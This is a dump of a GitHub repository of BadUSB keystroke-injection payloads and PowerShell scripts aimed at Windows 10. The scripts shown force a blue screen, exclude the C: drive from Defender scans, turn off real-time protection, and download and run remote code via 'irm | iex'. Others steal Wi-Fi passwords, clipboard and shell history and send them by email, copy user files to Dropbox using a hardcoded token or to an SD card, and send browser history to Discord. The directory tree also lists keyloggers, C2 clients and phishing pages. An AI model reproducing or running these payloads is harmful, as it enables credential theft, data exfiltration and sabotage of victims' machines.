├── 5 Second Screen Kill.js ├── BSOD.js ├── Chewbacca.js ├── Decode-Execute Base64.js ├── Decode-Execute from RunPrompt.js ├── Deep-Exfil-to-SD.js ├── Disable-RT-Protect.js ├── Email System Information.js ├── Exclude-C_slow.js ├── Exfil to Dropbox.js ├── Exfil-to-SD.js ├── Fake-Update-win10.js ├── Fast-Execution ├── Beigeworms-Tool-Suite │ ├── Beigeworms-Tool-Suite.js │ ├── README.md │ └── main.ps1 ├── Browser-History-to-Discord │ ├── Browser-History-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Clean-History │ ├── Clean-History.js │ ├── README.md │ └── main.ps1 ├── Computer-Acid │ ├── Computer-ACID-Prank.js │ ├── README.md │ └── main.ps1 ├── Discord-C2 │ ├── Discord C2 Client.js │ └── README.md ├── Discord-Infostealer │ ├── README.md │ ├── System-Info-to-Discord.js │ └── main.ps1 ├── Discord-Keylogger │ ├── Keylogger-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Download-and-Execute │ ├── Download-Execute.js │ └── README.md ├── Exfiltrate-to-Discord │ ├── Exfiltrate-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Exfiltrate-to-Dropbox │ ├── Exfiltrate-to-Dropbox.js │ ├── README.md │ └── main.ps1 ├── Exfiltrate-to-Telegram │ ├── Exfiltrate-to-Telegram.js │ ├── README.md │ └── main.ps1 ├── Exfiltrate-to-USB │ ├── Exfiltrate-to-USB.js │ ├── README.md │ └── main.ps1 ├── File-Monitor-to-Discord │ ├── File-Changes-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Filetype-Organizer │ ├── Filetype-Organizer.js │ ├── README.md │ └── main.ps1 ├── GIF-Player │ ├── Gif-Player.js │ ├── README.md │ └── main.ps1 ├── Google-Phishing │ ├── Google-Phish-to-Discord.js │ ├── README.md │ └── main.ps1 ├── LAN-Tools │ ├── LAN-Tools.js │ └── README.md ├── Mouse-Monitor-to-Discord │ ├── Mouse-Activity-to-Discord.js │ ├── README.md │ └── main.ps1 ├── Netcat-Client │ ├── README.md │ ├── Simple-Netcat-Client.js │ └── main.ps1 ├── Netcat-Screenshare │ ├── Desktop Screenshare over Netcat.js │ ├── README.md │ └── main.ps1 ├── Network-Enumeration-GUI │ ├── Network-Enumeration-GUI.js │ ├── README.md │ └── main.ps1 ├── Record-Screen-GUI │ ├── README.md │ ├── Record-Screen-GUI.js │ ├── Record-Screen-GUI.txt │ └── main.ps1 ├── Screen-to-Discord │ ├── README.md │ ├── Screenshot-to-Discord.js │ └── main.ps1 ├── Screen-to-Telegram │ ├── README.md │ ├── Screenshot-to-Telegram.js │ └── main.ps1 ├── Shortcut-Spam │ ├── Desktop-Shortcut-Spam.js │ ├── README.md │ └── main.ps1 ├── Social-Search-GUI │ ├── README.md │ ├── Username-Search-GUI.js │ └── main.ps1 ├── Telegram-C2 │ ├── README.md │ └── Telegram C2 Client.js ├── Telegram-Infostealer │ ├── README.md │ ├── System-Info-to-Telegram.js │ └── main.ps1 ├── Telegram-Keylogger │ ├── Keylogger-to-Telegram.js │ ├── README.md │ └── main.ps1 ├── US-Keyboard-Layout │ ├── README.md │ ├── US-Keyboard.js │ └── main.ps1 ├── Wallpaper-Jumpscare │ ├── README.md │ ├── Wallpaper-Jumpscare.js │ └── main.ps1 ├── Webhook-Spammer-GUI │ ├── README.md │ ├── Webhook-Spammer-GUI.js │ └── main.ps1 ├── Wifi-Networks-to-Discord │ ├── Discord-WiFi-Grabber.js │ ├── README.md │ └── main.ps1 ├── Win10-Phishing │ ├── Fake-Windows-10-Logon.js │ ├── README.md │ └── main.ps1 └── Win11-Phishing │ ├── Fake-Windows-11-Logon.js │ ├── README.md │ └── main.ps1 ├── Fork-Bomb.js ├── GetChromeWIFI.js ├── Goose-from-SD.js ├── HIDden-Voices.js ├── Hidden-Wifi-Shell.js ├── Keylogger to Discord.js ├── Keylogger-to-Email.js ├── README.md ├── Real-Fork-Bomb.js ├── RickRoll-Max-Vol.js ├── Run File from SD.js ├── Set-US-Keyboard.js ├── Simple Netcat Client.js ├── Tree-of-Knowledge.js └── Windows-93_slow.js /5 Second Screen Kill.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: 5 Second Screen Kill 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Killss all displays for around 5 seconds. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | // script setup 14 | layout("us") 15 | 16 | // Open Powershell as Admin 17 | press("GUI r"); 18 | delay(1000); 19 | type("powershell -NoP -NonI -Exec Bypass"); 20 | delay(500); 21 | press("ENTER"); 22 | delay(4000); 23 | 24 | // Main Powershell code 25 | type("(Add-Type '[DllImport(\"user32.dll\")]public static extern int SendMessage (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit"); 26 | press("ENTER"); 27 | delay(500); 28 | -------------------------------------------------------------------------------- /BSOD.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Invoke Blue Screen 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Causes a blue screen on a target system. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // ============================================================================= 9 | // This is a dangerous script - Be Careful! 10 | 11 | // Script Setup 12 | layout('us'); 13 | // typingSpeed(1,1); 14 | 15 | // Main Payload 16 | press("GUI r"); 17 | delay(1000); 18 | type("powershell"); 19 | press("control shift enter"); 20 | delay(2000); 21 | press("left enter"); 22 | delay(5000); 23 | type("taskkill /f /im svchost.exe\n"); //instantly kills svchost.exe which causes a bluescreen. -------------------------------------------------------------------------------- /Chewbacca.js: -------------------------------------------------------------------------------- 1 | //========================== Mon's Chewbacca sound Player ============================== 2 | 3 | //SYNOPSIS 4 | // This script will play a Chewbacca sound. 5 | 6 | hide=false; // set to true to hide the console window on the target 7 | 8 | layout("us") 9 | press("GUI r"); 10 | delay(500); 11 | type("powershell -NoP -NonI -Exec Bypass"); 12 | press("CONTROL SHIFT ENTER"); 13 | delay(2500); 14 | press("ALT y"); 15 | delay(3000); 16 | type("Dism /online /Get-Intl"); 17 | press("ENTER") 18 | type("Set-WinSystemLocale en-US"); 19 | press("ENTER") 20 | type("Set-WinUserLanguageList en-US -Force"); 21 | press("ENTER") 22 | delay(500); 23 | 24 | function assurePS32() { 25 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 26 | delay(1000); 27 | } 28 | 29 | function hidePS() { 30 | type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)') 31 | press("ENTER"); 32 | delay(1000); 33 | } 34 | 35 | if (hide) { hidePS(); } 36 | delay(1000); 37 | assurePS32(); 38 | delay(2000); 39 | 40 | type("start-sleep 300"); 41 | press("ENTER"); 42 | type("irm -uri \"https://github.com/apsecdev/DigiSpark-Scripts/blob/master/Hi_Chewy/Chewbacca.wav\" -OutFile \"$env:temp\\play.wav\""); 43 | press("ENTER"); 44 | type("Add-Type -AssemblyName presentationCore"); 45 | press("ENTER"); 46 | type("$filepath = [uri] \"$env:temp\\play.wav\""); 47 | press("ENTER"); 48 | type("$wmplayer = New-Object System.Windows.Media.MediaPlayer;$wmplayer.Open($filepath)"); 49 | press("ENTER"); 50 | type("Start-Sleep 2"); 51 | press("ENTER"); 52 | type("$duration = $wmplayer.NaturalDuration.TimeSpan.TotalSeconds"); 53 | press("ENTER"); 54 | type("$wmplayer.Play();Start-Sleep $duration;$wmplayer.Stop();$wmplayer.Close();"); 55 | press("ENTER"); -------------------------------------------------------------------------------- /Decode-Execute Base64.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Base64 Decode & Execute 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Uses Powershell to decode a Base64 string and then execute the file. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // *SETUP* 12 | // replace YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES and NAME_HERE below. 13 | 14 | // ============================================================================= 15 | 16 | // script setup 17 | layout("us") 18 | 19 | // Open Powershell as Admin 20 | press("GUI r"); 21 | delay(1000); 22 | type("powershell -NoP -NonI -Exec Bypass"); 23 | delay(500); 24 | press("CONTROL SHIFT ENTER"); 25 | delay(3000); 26 | press("ALT y"); 27 | delay(4000); 28 | 29 | // Main Powershell code 30 | type("$b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES';"); 31 | press("ENTER"); 32 | delay(500); 33 | type("$decodedFile = [System.Convert]::FromBase64String($b64);"); 34 | press("ENTER"); 35 | delay(500); 36 | type("$File = \"NAME_HERE\"+\".exe\";"); 37 | press("ENTER"); 38 | delay(500); 39 | type("Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File"); 40 | press("ENTER"); 41 | delay(500); 42 | -------------------------------------------------------------------------------- /Decode-Execute from RunPrompt.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Download and Execute from Run Prompt 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Download and Execute any file from the Run Prompt. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | // script setup 14 | layout("us") 15 | 16 | 17 | press("GUI r"); 18 | delay(1000); 19 | type("powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\\;Start-Sleep 1;"); 20 | delay(500); 21 | type("iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit"); 22 | delay(500); 23 | press("ENTER"); 24 | 25 | -------------------------------------------------------------------------------- /Deep-Exfil-to-SD.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Exfiltrate Files to SD card (Deep) 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Searches target for matching filetypes and copies all files to th SD card. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRERD] 10 | 11 | // ============================================================================= 12 | // Script Setup 13 | layout('us'); 14 | // typingSpeed(1,1); 15 | 16 | // Main Payload 17 | press("GUI r"); 18 | delay(1000); 19 | type("powershell -NoP -NonI -Exec Bypass"); 20 | delay(500); 21 | press("ENTER"); 22 | delay(5000); 23 | 24 | function assurePS32() { 25 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 26 | delay(4000); 27 | } 28 | assurePS32(); // open a 32bit console, if the current one is 64bit 29 | delay(4000); 30 | 31 | type("cd $env:USERPROFILE\n") 32 | 33 | type("$usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'RECOVERY' } | select name\n"); //change YOUR_VOLUME_NAME to the name of your mounted usb volume. 34 | var filetypes = ["jpg", "png", "txt", "html", "gif", "js", "sql", "docx", "php"] // array of filetypes, add filetypes to your liking. 35 | for (var i = 0; i < filetypes.length; i++) { 36 | type("copy *." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 37 | type("copy */*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 38 | type("copy */*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 39 | type("copy */*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 40 | type("copy */*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 41 | type("copy */*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 42 | type("copy */*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 43 | type("copy */*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 44 | type("copy */*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 45 | type("copy */*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 46 | type("copy */*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 47 | type("copy */*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 48 | type("copy */*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 49 | type("copy */*/*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 50 | type("copy */*/*/*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 51 | type("copy */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 52 | } 53 | -------------------------------------------------------------------------------- /Disable-RT-Protect.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Disable Real-Time Protection via GUI 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Disable Real-Time Protection via the Windows Defender GUI. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | delay(1000); 19 | press("GUI r"); 20 | delay(2500); 21 | type("windowsdefender://threatsettings"); 22 | delay(500); 23 | press("ENTER"); 24 | delay(5000); 25 | press("SPACE"); 26 | delay(2000); 27 | press("ALT y"); 28 | delay(3000); 29 | press("ALT F4"); 30 | -------------------------------------------------------------------------------- /Email System Information.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Email System Information. 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Uses Powershell to gather user and system information and send to an Email. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // *REQUIREMENTS* 12 | // you will need a Microsoft Outlook Email address for this to work 13 | 14 | // *SETUP* 15 | // replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) 16 | 17 | // ============================================================================= 18 | 19 | // script setup 20 | layout("us") 21 | 22 | // Open Powershell as Admin 23 | press("GUI r"); 24 | delay(1000); 25 | type("powershell -NoP -NonI -Exec Bypass"); 26 | delay(500); 27 | press("CONTROL SHIFT ENTER"); 28 | delay(3000); 29 | press("ALT y"); 30 | delay(4000); 31 | 32 | // Main Powershell code 33 | type("$email = \"EMAIL_HERE\";$pass = \"PASSWORD_HERE\""); 34 | press("ENTER"); 35 | delay(500); 36 | type(";$usr = \"Username: $($usrinf.Name)\";$usr += \"`nFull Name: $($usrinf.FullName)`n\";$usr+=\"Public Ip Address = \";$usr+=((Iwr ifconfig.me/ip).Content.Trim() | Out-String)"); 37 | press("ENTER"); 38 | delay(500); 39 | type(";$usr+=\"`n\";$usr+=\"All User Accounts: `n\";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem"); 40 | press("ENTER"); 41 | delay(500); 42 | type(";$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount"); 43 | press("ENTER"); 44 | delay(500); 45 | type(";$sysstr = \"Operating System: $($sys.Caption) $($sys.OSArchitecture)\";$sysstr += \"`nBIOS Version: $($bios.SMBIOSBIOSVersion)\";$sysstr += \"`nProcessor: $($proc.Name)\""); 46 | press("ENTER"); 47 | delay(500); 48 | type(";$sysstr += \"`nMemory: $($sys.TotalVisibleMemorySize) MB\";$sysstr += \"`nComputer Name: $($comp.Name)\";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version"); 49 | press("ENTER"); 50 | delay(500); 51 | type(";$progstr = \"Installed Programs:`n\";foreach($program in $iprog){;$progstr += \"$($program.Name) $($program.Version)`n\"}"); 52 | press("ENTER"); 53 | delay(500); 54 | type(";$a=0;$ws=(netsh wlan show profiles) -replace \".*:\\s+\""); 55 | press("ENTER"); 56 | delay(500); 57 | type(";foreach($s in $ws){if($a -gt 1 -And $s -NotMatch \" policy \" -And $s -ne \"User profiles\" -And $s -NotMatch \"-----\" -And $s -NotMatch \"\" -And $s.length -gt 5){"); 58 | press("ENTER"); 59 | delay(500); 60 | type(";$ssid=$s.Trim();if($s -Match \":\"){$ssid=$s.Split(\":\")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass=\"None\""); 61 | press("ENTER"); 62 | delay(500); 63 | type(";foreach($p in $pw){if($p -Match \"Key Content\"){$pass=$p.Split(\":\")[1].Trim();$wifistr+=\"SSID: $ssid`nPassw: $pass`n\"}}}$a++;}"); 64 | press("ENTER"); 65 | delay(500); 66 | type(";$pshist = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\""); 67 | press("ENTER"); 68 | delay(500); 69 | type(";\" USER INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII;$usr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append"); 70 | press("ENTER"); 71 | delay(500); 72 | type(";\" CLIPBOARD INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append"); 73 | press("ENTER"); 74 | delay(500); 75 | type(";\" POWERSHELL HISTORY`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append"); 76 | press("ENTER"); 77 | delay(500); 78 | type(";\" SYSTEM INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;$sysstr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append"); 79 | press("ENTER"); 80 | delay(500); 81 | type(";\" WIFI INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;$wifistr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append"); 82 | press("ENTER"); 83 | delay(500); 84 | type(";\" PROGRAMS INFO`n\" | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append;$progstr | Out-File -FilePath \"$env:temp\\sys.txt\" -Encoding ASCII -Append"); 85 | press("ENTER"); 86 | delay(500); 87 | type(";$syslog = \"$env:temp\\sys.txt\";$subj = \"$env:COMPUTERNAME : : Results\";$body = \"$env:COMPUTERNAME : Info Scraper Results... : $time\""); 88 | press("ENTER"); 89 | delay(500); 90 | type(";$smtp = \"smtp.outlook.com\";$prt = \"587\";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force)"); 91 | press("ENTER"); 92 | delay(500); 93 | type(";$time = Get-Date;$ct = $time.addminutes($lost)"); 94 | press("ENTER"); 95 | delay(500); 96 | type(";send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl"); 97 | press("ENTER"); 98 | delay(500); 99 | type(";sleep 1;exit"); 100 | press("ENTER"); 101 | delay(500); 102 | -------------------------------------------------------------------------------- /Exclude-C_slow.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Exclude C:/ Drive. 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Exclude C:/ Drive from future Microsoft Defender scans. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | press("GUI r"); 19 | delay(1000); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(2000); 24 | press("ALT y"); 25 | delay(4000); 26 | type("Add-MpPreference -ExclusionPath C:\\ ; exit"); 27 | press("ENTER") 28 | -------------------------------------------------------------------------------- /Exfil to Dropbox.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Exfiltrate to Dropbox 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Exfiltrate specified filetypes to Dropbox . 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // *SETUP* 12 | // make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 13 | // generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. 14 | 15 | // ============================================================================= 16 | 17 | // script setup 18 | layout("us") 19 | 20 | // Open Powershell as Admin 21 | press("GUI r"); 22 | delay(1000); 23 | type("powershell -NoP -NonI -Exec Bypass"); 24 | delay(500); 25 | press("CONTROL SHIFT ENTER"); 26 | delay(3000); 27 | press("ALT y"); 28 | delay(4000); 29 | 30 | // Main Powershell code 31 | type("$accessToken = \"sl.BfOs10PaIXKrdYUcBKxCCmHCnhLI6WYNQE3ARc1CDeeMRBDRGaMsaKbi3QrCyim5NeOGQPfC9wSZHkZWDelpslxSbKIp0UJkiLPdYS9QT2khPOaeE9V9yZTNSbyGoxVOAJnVyLQx5CE\""); 32 | type(";$localFolderPath = \"$env:USERPROFILE\"; $computerName = \"$env:COMPUTERNAME\"; $dropboxCreateFolderUrl = \"https://api.dropboxapi.com/2/files/create_folder_v2\""); 33 | type(";$dropboxFolderPath = $computerName.ToString(); $dropboxUploadUrl = \"https://content.dropboxapi.com/2/files/upload\" "); 34 | press("ENTER"); 35 | delay(500); 36 | type("$headers = @{\"Authorization\" = \"Bearer $accessToken\""); 37 | press("ENTER"); 38 | delay(500); 39 | type("\"Content-Type\" = \"application/octet-stream\"}"); 40 | press("ENTER"); 41 | delay(500); 42 | type("$body = @{\"path\" = \"/$computerName\""); 43 | press("ENTER"); 44 | delay(500); 45 | type("\"autorename\" = $true}| ConvertTo-Json; $files = Get-ChildItem -Path $localFolderPath -Include \"*.docx\",\"*.txt\",\"*.pdf\",\"*.jpg\",\"*.png\" -Recurse "); 46 | press("ENTER"); 47 | delay(500); 48 | type("foreach($file in $files){$relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') "); 49 | type(";$dropboxFilePath = \"$dropboxFolderPath/$relativePath\".Replace('\\', '/') "); 50 | type(";$headers[\"Dropbox-API-Arg\"] = \"{`\"path`\": `\"/$dropboxFilePath`\", `\"mode`\": `\"add`\", `\"autorename`\": true, `\"mute`\": false}\""); 51 | type(";try{$fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) "); 52 | type(";$response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes}catch{}}"); 53 | delay(500); 54 | press("ENTER"); 55 | 56 | -------------------------------------------------------------------------------- /Exfil-to-SD.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Exfiltrate Files to SD card. 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Searches target for matching filetypes and copies all files to th SD card. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // exfil lootchest [REQUIRERD] 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | press("GUI r"); 19 | delay(1000); 20 | type("powershell -NoP -NonI -Exec Bypass"); 21 | delay(500); 22 | press("CONTROL SHIFT ENTER"); 23 | delay(3000); 24 | press("ALT y"); 25 | delay(4000); 26 | 27 | function assurePS32() { 28 | type("if ([IntPtr]::Size -ne 4){& $env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe}\n"); 29 | delay(4000); 30 | } 31 | assurePS32(); // open a 32bit console, if the current one is 64bit 32 | delay(4000); 33 | 34 | type("$usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'RECOVERY' } | select name\n") //change YOUR_VOLUME_NAME to the name of your mounted usb volume. 35 | var filetypes = ["jpg", "png", "txt", "html", "gif", "js", "sql", "docx", "php"] // array of filetypes, add filetypes to your liking. 36 | for (var i = 0; i < filetypes.length; i++) { 37 | type("copy *." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 38 | type("copy */*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 39 | type("copy */*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 40 | type("copy */*/*/*." + filetypes[i] + " $usbpath.name\n") //copies files with your filetypes to your mounted usb volume. 41 | } 42 | -------------------------------------------------------------------------------- /Fake-Update-win10.js: -------------------------------------------------------------------------------- 1 | // ============================================================================= 2 | // Title: Fake Update for Windows 3 | // Author: @beigeworm | https://github.com/beigeworm 4 | // Description: Start a fake Update for Windows through a browser. 5 | // Target: Windows 10 6 | // ============================================================================= 7 | 8 | // *USB SETTING* 9 | // startup 10 | 11 | // ============================================================================= 12 | 13 | // Script Setup 14 | layout('us'); 15 | // typingSpeed(1,1); 16 | 17 | // Main Payload 18 | delay(500); 19 | press("GUI r"); 20 | delay(1500); 21 | type("cmd"); 22 | delay(200) 23 | press("CTRL SHIFT ENTER"); 24 | delay(2000); 25 | press("ALT y"); 26 | delay(4000); 27 | type("taskkill /F /IM msedge.exe /T > nul") 28 | delay(100); 29 | press("ENTER"); 30 | delay(500); 31 | type("exit") 32 | delay(100); 33 | press("ENTER"); 34 | delay(2000); 35 | press("GUI r"); 36 | delay(1500); 37 | type("msedge.exe --new-window -kiosk https://fakeupdate.net/win8"); 38 | delay(200) 39 | press("ENTER"); 40 | delay(1500); 41 | press("F11"); -------------------------------------------------------------------------------- /Fast-Execution/Beigeworms-Tool-Suite/Beigeworms-Tool-Suite.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Tool Suite GUI 2 | // Author: @beigeworm 3 | // Description: This script Starts a GUI with a huge set of tools. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -C irm is.gd/bwtoolset | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | 17 | -------------------------------------------------------------------------------- /Fast-Execution/Beigeworms-Tool-Suite/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Beigeworm's Toolset GUI

3 | 4 | SYNOPSIS 5 | 6 | All useful tools in one place. 7 | A selection of Powershell tools from this repo can be ran from this script. 8 | 9 | USAGE 10 | 11 | 12 | 1. Run the script and follow options in the GUI 13 | 14 | INFO 15 | 16 | Closing this script will NOT close any scripts that were started from this script. 17 | Any background/hidden scripts eg. C2 clients will keep running. 18 | -------------------------------------------------------------------------------- /Fast-Execution/Browser-History-to-Discord/Browser-History-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's browser history to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script collects browser history and posts results to a discord webhook. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Browser-History-to-Discord/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Browser-History-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Browser History and Bookmarks to Discord

3 | 4 | SYNOPSIS 5 | 6 | Gathers History and Bookmarks data from database files and sends it to discord 7 | 8 | USAGE 9 | 10 | 1. Replace YOUR_WEBHOOK_HERE with your Discord webhook. 11 | 2. Run the script and check Discord for results. -------------------------------------------------------------------------------- /Fast-Execution/Browser-History-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 |  2 | $whuri = "$dc" 3 | 4 | $outpath = "$env:temp\history.txt" 5 | "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII 6 | 7 | # Define the Regular expression for extracting history and bookmarks 8 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 9 | 10 | # Define paths for data storage 11 | $Paths = @{ 12 | 'chrome_history' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" 13 | 'chrome_bookmarks' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" 14 | 'edge_history' = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" 15 | 'edge_bookmarks' = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks" 16 | 'firefox_history' = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite" 